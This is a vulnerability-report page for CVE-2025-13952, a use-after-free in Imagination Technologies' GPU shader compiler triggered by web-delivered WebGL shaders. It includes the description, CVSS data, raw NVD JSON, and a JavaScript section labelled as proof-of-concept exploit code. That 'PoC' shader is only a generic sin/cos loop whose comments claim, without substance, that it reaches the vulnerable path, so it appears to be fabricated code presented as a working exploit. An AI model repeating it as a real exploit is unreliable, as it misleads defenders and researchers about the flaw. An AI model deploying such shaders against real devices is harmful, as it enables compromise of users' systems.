Security Vulnerability Report
CVE-2025-13952 CVSS 9.8 CRITICAL

CVE-2025-13952

Published: 2026-01-24 03:16:00
Last Modified: 2026-01-28 18:33:18
Source: 367425dc-4d06-4041-9650-c2dc6aaa27ce

Description

A web page containing unusual GPU shader code, when loaded from the Internet into the GPU compiler process, triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges, this could enable further exploits on the device. The shader code contained in the web page executes a path in the compiler that held onto an out-of-date pointer to a freed memory object.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:imaginationtech:ddk:*:*:*:*:*:*:*:* - VULNERABLE
Imagination Technologies GPU Driver (all unpatched versions)
Affected web browsers (WebGL implementations using Imagination GPUs)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-13952 PoC - Malicious WebGL Shader Code
// This PoC demonstrates the GPU shader compiler vulnerability
// Note: This is for educational and security research purposes only
const gl = document.createElement('canvas').getContext('webgl');

// Fragment shader designed to trigger the use-after-free condition
// in Imagination Technologies GPU shader compiler
const fragmentShaderSource = `
precision highp float;
void main() {
    // Crafted shader code that triggers the vulnerable code path
    // in the GPU shader compiler where an outdated pointer is retained
    vec4 color = vec4(0.0);
    // These operations trigger the compiler path that holds onto
    // a pointer to a freed memory object
    for(int i = 0; i < 10; i++) {
        color += vec4(float(i) * 0.1);
        // Complex shader operations that expose the memory management bug
        color = sin(color) * cos(color);
    }
    gl_FragColor = color;
}
`;

const vertexShaderSource = `
attribute vec4 position;
void main() {
    gl_Position = position;
}
`;

function createShader(gl, type, source) {
    const shader = gl.createShader(type);
    gl.shaderSource(shader, source);
    gl.compileShader(shader);
    return shader;
}

// Trigger the vulnerability by loading the malicious shader
const fragmentShader = createShader(gl, gl.FRAGMENT_SHADER, fragmentShaderSource);
const vertexShader = createShader(gl, gl.VERTEX_SHADER, vertexShaderSource);

// Create and link the program - this is where the compiler processes the shader
const program = gl.createProgram();
gl.attachShader(program, vertexShader);
gl.attachShader(program, fragmentShader);
gl.linkProgram(program);
gl.useProgram(program);

// Draw to trigger shader execution
gl.drawArrays(gl.TRIANGLES, 0, 3);

References

https://www.imaginationtech.com/gpu-driver-vulnerabilities/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13952", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-01-24T03:16:00.360", "lastModified": "2026-01-28T18:33:18.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A web page that contains unusual GPU shader code is loaded from the Internet into the GPU compiler process triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device.\n\nThe shader code contained in the web page executes a path in the compiler that held onto an out of date pointer, pointing to a freed memory object."}, {"lang": "es", "value": "Una página web que contiene código de sombreador de GPU inusual se carga desde Internet en el proceso del compilador de GPU y desencadena un fallo de escritura de uso después de liberación en la librería del compilador de sombreadores de GPU. En ciertas plataformas, cuando el proceso del compilador tiene privilegios de sistema, esto podría permitir explotaciones adicionales en el dispositivo.\n\nEl código de sombreador contenido en la página web ejecuta una ruta en el compilador que mantenía un puntero obsoleto, apuntando a un objeto de memoria liberado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3", "matchCriteriaId": "99A33CBA-49C5-4976-B668-88F87F0FF575"}]}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "tags": ["Vendor Advisory"]}]}}